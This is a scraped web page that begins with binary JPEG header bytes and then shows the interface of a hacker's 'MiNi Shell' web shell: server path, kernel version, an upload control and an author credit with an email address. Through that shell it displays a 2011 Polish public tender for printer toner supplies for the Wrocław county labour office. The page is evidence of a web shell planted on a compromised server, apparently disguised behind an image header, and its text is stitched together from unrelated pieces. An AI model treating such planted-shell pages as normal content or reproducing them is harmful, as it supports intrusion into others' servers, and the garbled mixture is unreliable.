JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111124/307987-N-2011.html

<p class="kh_header"><b>Wrocław: Dostawa materiałów eksploatacyjnych do urządzeń drukujących
i odbiór zużytych materiałów eksploatacyjnych na potrzeby Powiatowego Urzędu Pracy we Wrocławiu</b><br>
<b>Numer ogłoszenia: 307987 - 2011; data zamieszczenia: 24.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy we Wrocławiu , ul. Gliniana 20-22, 50-525 Wrocław, woj. dolnośląskie, tel. 71 7701 600, faks 71 7701 633.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pup.wroclaw.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów eksploatacyjnych do urządzeń drukujących
i odbiór zużytych materiałów eksploatacyjnych na potrzeby Powiatowego Urzędu Pracy we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA 

A. PRZEDMIOT ZAMÓWIENIA

1.Przedmiotem zamówienia jest:
a)dostawa materiałów eksploatacyjnych do drukarek, urządzeń wielofunkcyjnych, kserokopiarek, faksów i kalkulatorów do siedziby Powiatowego Urzędu Pracy we Wrocławiu;
b)odbiór nieuszkodzonych i uszkodzonych zużytych materiałów eksploatacyjnych               z siedziby Powiatowego Urzędu Pracy we Wrocławiu.
2.Dostawę materiałów eksploatacyjnych i odbiór zużytych materiałów eksploatacyjnych Wykonawca wykona własnym staraniem, na własny koszt                 i ryzyko.

B. DOSTAWA MATERIAŁÓW EKSPLOATACYJNYCH

1.Szacowana ilość, rodzaj i parametry zamawianych materiałów eksploatacyjnych zostały określone w poniższych tabelach nr 1 i nr 2 oraz w ZAŁĄCZNIKACH  NR 2.1 i NR 2.2 do SIWZ.
2.Zamawiający wymaga materiałów eksploatacyjnych oryginalnych dla urządzeń będących na gwarancji oraz dopuszcza równoważne dla pozostałych urządzeń.
3.Dostarczone materiały eksploatacyjne do drukarek i urządzeń wielofunkcyjnych będących na gwarancji, wyszczególnione w poniższej Tabeli nr 1 oraz                       w ZAŁACZNIKU NR 2.1 do SIWZ muszą być:
a)oryginalne i fabrycznie nowe (w których żaden element nie był wymieniany) oraz przewidziane i zalecane przez producentów drukarek i urządzeń wielofunkcyjnych w instrukcjach obsługi technicznej nie powodujące utraty gwarancji producenta,
b)nie dopuszcza się dostarczania materiałów eksploatacyjnych regenerowanych oraz poddanych procesowi ponownego napełniania,
c)muszą posiadać oznaczenie produktu - znak firmowy (symbol), termin ważności lub datę produkcji z okresem ważności,
d)muszą posiadać kartę gwarancyjną przy każdej partii materiałów eksploatacyjnych.

Tabela nr 1
Lp.
Rodzaj materiału
Producent urządzenia
Model urządzenia
Opis materiału
Minimalna wydajność 1 szt. materiału 
Ilość (szt.)
1.
Toner czarny 
Brother 
MFC-8380dn
TN-3280 
8000 str.
7
2.
Bęben
Brother 
MFC-8380dn
DR-3200
25000 str.
5
3.
Toner czarny
Konica Minolta
BizHub C-253
TN213K
24500 str.
4
4.
Toner czarny
Konica Minolta
BizHub C35
TNP22K
6000 str.
30
5.
Toner cyan
Konica Minolta
BizHub C35
TNP22C
6000 str.
20
6.
Toner magenta
Konica Minolta
BizHub C35
TNP22M
6000 str.
20
7.
Toner żółty
Konica Minolta
BizHub C35
TNP22Y
6000 str.
20
8.
Toner czarny
Konica Minolta
PagePro 5650EN-d
A0FP022
19000 str.
15
9.
Toner czarny
Nashuatec
SPC222SF
CT220BLK
2000 str.
30
10.
Toner cyan
Nashuatec
SPC222SF
CT220CYN 
2000 str.
15
11.
Toner magenta
Nashuatec
SPC222SF
CT220MGT
2000 str.
10
12.
Toner żółty
Nashuatec
SPC222SF
 CT220YLW
2000 str.
15
13.
Toner czarny
OKI
B6500dn
9004462
22000 str.
20

4.Dostarczone materiały eksploatacyjne do drukarek, urządzeń wielofunkcyjnych, kserokopiarek, faksów i kalkulatorów, wyszczególnione w poniższej Tabeli nr 2 oraz w ZAŁACZNIKU NR 2.2 do SIWZ muszą być:
a) oryginalne lub równoważne pod warunkiem zagwarantowania co najmniej tych samych parametrów techniczno - jakościowych co określona klasa oryginalnych materiałów eksploatacyjnych, fabrycznie nowe, 
b)do produkcji których użyto materiałów nowych nie regenerowanych, które przeszły testy wykluczające wady materiałowe (nieszczelność, mikropęknięcia), w tym: obudowy, wałki światłoczułe, listwy, koła zębate, złącza, elementy elektroniczne i inne,
c)muszą posiadać na opakowaniu czytelną nazwę producenta i listę kompatybilności (lista typów drukarek do których dany materiał eksploatacyjny jest przystosowany), tj. kartę charakterystyki, termin ważności lub datę produkcji z okresem ważności oraz muszą posiadać kartę gwarancyjną dostarczoną przy każdej partii materiałów eksploatacyjnych.

Tabela nr 2 
Lp.
Rodzaj materiału
Producent urządzenia
Model urządzenia
Opis materiału
Minimalna wydajność 
1 szt. materiału 
Ilość (szt.)
1.
Toner czarny
Brother
HL 8050N
TN-1700
17000 str.
10
2.
Toner czarny
CPG
Page Master 402N
PRKN402
20000 str.
1
3.
Toner czarny
HP
LaserJet 1160
Q5949A
2500 str.
25
4.
Toner czarny
HP
LaserJet 1300
Q2613X
4000 str.
2
5.
Toner czarny
HP
LaserJet 2300
Q2610A
6000 str.
30
6.
Toner czarny
HP
LaserJet 3030
Q2612A
2000 str.
30
7.
Toner czarny
HP
LaserJet 3550n
Q2670A
6000 str.
15
8.
Toner cyan
HP
LaserJet 3550n
Q2671A
4000 str.
8
9.
Toner magenta
HP
LaserJet 3550n
Q2673A
4000 str.
8
10.
Toner żółty
HP
LaserJet 3550n
Q2672A
4000 str.
10
11.
Toner czarny
HP
LaserJet 4250
Q5942X
20000 str.
4
12.
Toner czarny
HP
LaserJet 4650
C9720A
9000 str.
5
13.
Toner cyan
HP
LaserJet 4650
C9721A
8000 str.
3
14.
Toner magenta
HP
LaserJet 4650
C9723A
8000 str.
5
15.
Toner żółty
HP
LaserJet 4650
C9722A
8000 str.
2
16.
Toner czarny
Lexmark
C532N
C5220KS
4000 str.
4
17.
Toner cyan
Lexmark
C532N
C5220CS
3000 str.
2
18.
Toner magenta
Lexmark
C532N
C5220MS
3000 str.
3
19.
Toner żółty
Lexmark
C532N
C5220YS
3000 str.
3
20.
Zestaw bębnów (4x)
Lexmark
C532N
C53034X
20000 str.
1
21.
Taśma barwiąca czarna
OKI 
ML 320/3320/3321
9002303
3000 znaków
50
22.
Toner czarny
OKI 
B6300 
9004079
17000 str.
1
23.
Toner czarny
Xerox
WorkCentre Pro 123
006R01182
30000 str.
3
24.
Bęben
Xerox
WorkCentre Pro 123
013R00589 
60000 str.
1
25.
Toner czarny
Xerox
WorkCentre 4118x
6R01278
8000 str.
10
26.
Bęben
Xerox
WorkCentre 4118x
013R00671
20000 str.
5
27.
Czarny toner
MITA
DC 3060
37085010
20000 str.
10
28.
Czarny toner
UTAX
1315
Copy Kit 1315
6000 str.
26
29.
Folia termotransferowa
Panasonic
KX-FP 268 OPD
KX-FA52E
90 str.
12
30.
Folia termotransferowa
Panasonic
KX-FP 343
KX-FA57E
 210 str.
24
31.
Czarny wkład atramentowy
Canon
B155, B820
BX-3
1000 str.
12
32.
Czarny wkład
laserowy
Canon
L-295
FX-3
2500 str.
6
33.
Czarny wkład laserowy
Canon
L-140
FX-10
2000 str.
6
34.
Rolka barwiąca czarno-czerwona
Citizen
CX-130, CX-123II
IR-40T
3 linie/sek.
48

5.Wykonawca, który powołuje się na rozwiązania równoważne opisywane przez Zamawiającego jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy Prawo zamówień publicznych ) - zawarte w ZAŁĄCZNIKACH NR 2.1 i NR 2.2 do SIWZ.
6.Zamawiający przez kartę gwarancyjną rozumie pisemne oświadczenie gwaranta (producenta lub Wykonawcy); karta musi zawierać:
a)nazwę i adres gwaranta,
b)datę zakupu,
c)określenie materiału eksploatacyjnego sprzedanego,
d)czas, na jaki została udzielona gwarancja,
e)zobowiązania gwaranta.
7.Karta charakterystyki musi zawierać informacje:
f)nazwę materiału eksploatacyjnego,
g)symbolu materiału eksploatacyjnego,
h)typ urządzenia (drukarka, urządzenie wielofunkcyjne, kserokopiarka, faks, kalkulator) dla którego został wyprodukowany materiał eksploatacyjny,
i)kartą charakterystyki może być również firmowe opakowanie produktu, na którym zawarte będą ww. informacje.
8.Użycie materiałów eksploatacyjnych z ZAŁĄCZNIKA NR 2.1 do SIWZ nie może spowodować utraty gwarancji producenta drukarek i urządzeń wielofunkcyjnych. 
9.Użycie materiałów eksploatacyjnych z ZAŁĄCZNIKÓW NR 2.1 i NR 2.2 do SIWZ nie może powodować ograniczeń funkcji i możliwości urządzeń oraz jakości wydruku - wyspecyfikowanych w warunkach technicznych producenta drukarek, urządzeń wielofunkcyjnych, kserokopiarek, faksów i kalkulatorów.
10.W przypadku ukrytych wad materiałów eksploatacyjnych, powodujących nieprawidłowe użytkowanie sprzętu (drukarek, urządzeń wielofunkcyjnych, kserokopiarek, faksów i kalkulatorów), Wykonawca gwarantuje zwrot kosztów naprawy ww. sprzętu, po uprzednim przedstawieniu ekspertyzy wykonanej na koszt Wykonawcy przez autoryzowany serwis urządzeń, a na czas przeprowadzonej naprawy dostarczy w ciągu 7 dni sprzęt zastępczy o nie gorszych parametrach technicznych niż sprzęt uszkodzony.
11.Dostawa materiałów eksploatacyjnych będzie realizowana sukcesywnie, partiami na podstawie zamówień składanych przez Zamawiającego telefonicznie, e-mailem lub faksem, w terminie do 2 dni roboczych od daty otrzymania zamówienia. Przedmiot zamówienia będzie dostarczany w godzinach 7:30 - 15:30 (od poniedziałku do piątku). 
12.W zamówieniu określone będą ilości i rodzaj asortymentu oraz miejsce dostawy zamówionej partii, która może obejmować dostawę np. tylko 1 sztuki z danej pozycji.
13.W przypadku otrzymania towaru złej jakości oraz w razie ujawnienia wad po odbiorze Wykonawca, na swój koszt, dokona jego wymiany na nowy w terminie do 2 dni roboczych od chwili zgłoszenia.
14.Na dostarczone materiały eksploatacyjne oferowane w ZAŁĄCZNIKACH                  NR 2.1 i NR 2.2 do SIWZ Wykonawca udziela 12 miesięcy gwarancji, której bieg rozpoczyna się od daty odbioru, potwierdzonego protokołem odbioru.
15.Zamawiający w zależności od faktycznego zapotrzebowania w ramach złożonej oferty, zastrzega sobie prawo do zmiany ilości poszczególnego asortymentu                z zastrzeżeniem, iż dokonane zmiany nie spowodują zwiększenia wartości brutto całej umowy. Nie wszystkie pozycje asortymentu muszą być zrealizowane                 w pełnym zakresie ilościowym. Faktyczna ilość zamówienia zależeć będzie od potrzeb Zamawiającego. Wykonawcy nie służy roszczenie o realizację wymienionego asortymentu w ilościach podanych w ofercie.

C. ODBIÓR ZUŻYTYCH MATERIAŁÓW EKSPLOATACYJNYCH

16.Odbiór zużytych materiałów eksploatacyjnych (uszkodzonych                                    i nieuszkodzonych) będzie realizowany sukcesywnie, partiami na podstawie zgłoszenia przez Zamawiającego telefonicznie, e-mailem lub faksem w terminie do 5 dni roboczych od daty zgłoszenia. Przedmiot zamówienia będzie odbierany w godzinach 7:30 - 15:30 (od poniedziałku do piątku).
17.Odbiór zużytych materiałów eksploatacyjnych będzie następował nie częściej niż raz w miesiącu.
18.W zgłoszeniu określone będą: ilość i rodzaj asortymentu oraz miejsce odbioru partii zużytych materiałów eksploatacyjnych.
19.Wykonawca zobowiązuje się do dokonywania zapłaty za skup nieuszkodzonych zużytych materiałów określonych w ZAŁĄCZNIKACH NR 2.1 i NR 2.2 do SIWZ na podstawie faktury VAT wystawionej przez Zamawiającego.
20.Podstawą wystawienia faktury będzie protokół odebranych partii nieuszkodzonych zużytych materiałów eksploatacyjnych, podpisany przez osoby upoważnione przez strony. Protokół odbioru musi zawierać: rodzaj (nazwa, producent) oraz ilość odpowiednio: oryginalnych, równoważnych nieuszkodzonych i uszkodzonych materiałów eksploatacyjnych.
21.Wykonawca po dokonaniu odbioru od Zamawiającego partii przedmiotu umowy, o którym mowa w pkt 16, wystawi niezwłocznie kartę przekazania odpadu zgodnie z Ustawą o odpadach z dnia 27 kwietnia 2001r. (tekst jedn. Dz. U.               z 2010 Nr 185 poz. 1243 z późn. zm.).
22.Po odebraniu zużytych materiałów eksploatacyjnych odpowiedzialność za ich gospodarowanie ponosi Wykonawca.
23.Szczegółowy opis przedmiotu zamówienia oraz zasady realizacji zamówienia zostały zawarte we Wzorze umowy - ZAŁĄCZNIK NR 5 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać zezwolenie/decyzję lub inne dokumenty zezwalające na prowadzenie działalności w zakresie zbierania                       i transportu odpadów (powstających ze zużytych materiałów eksploatacyjnych) innych niż niebezpieczne lub musi posiadać wpis do rejestru posiadaczy odpadów zwolnionych z obowiązku posiadania zezwolenia na prowadzenie działalności                  w zakresie zbierania i/lub transportu odpadów powstałych z materiałów eksploatacyjnych, zgodnie z ustawą z dnia 27 kwietnia 2001r.o odpadach (tekst jedn. Dz. U. z 2010 Nr 185 poz. 1243 z późn. zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">aktualne zezwolenie/decyzja/inny dokument zezwalający na prowadzenie działalności w zakresie zbierania i transportu odpadów (powstających ze zużytych materiałów eksploatacyjnych) innych niż niebezpieczne lub dokument o wpisie do rejestru posiadaczy odpadów zwolnionych z obowiązku posiadania zezwolenia na prowadzenie działalności           w zakresie zbierania i/lub transportu odpadów powstałych z materiałów eksploatacyjnych, zgodnie z ustawą z dnia 27 kwietnia 2001r. o odpadach (tekst jedn. Dz. U. z 2010 Nr 185 poz. 1243 z późn. zm.)</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Cena za odbiór (skup) zużytych nieuszkodzonych materiałów eksploatacyjnych - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup.wroclaw.ibip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy we Wrocławiu
ul. Gliniana 20-22, pokój 508 (5 poziom).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2011 godzina 10:45, miejsce: Powiatowy Urząd Pracy we Wrocławiu
ul. Gliniana 20-22, pokój 04 (parter, kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com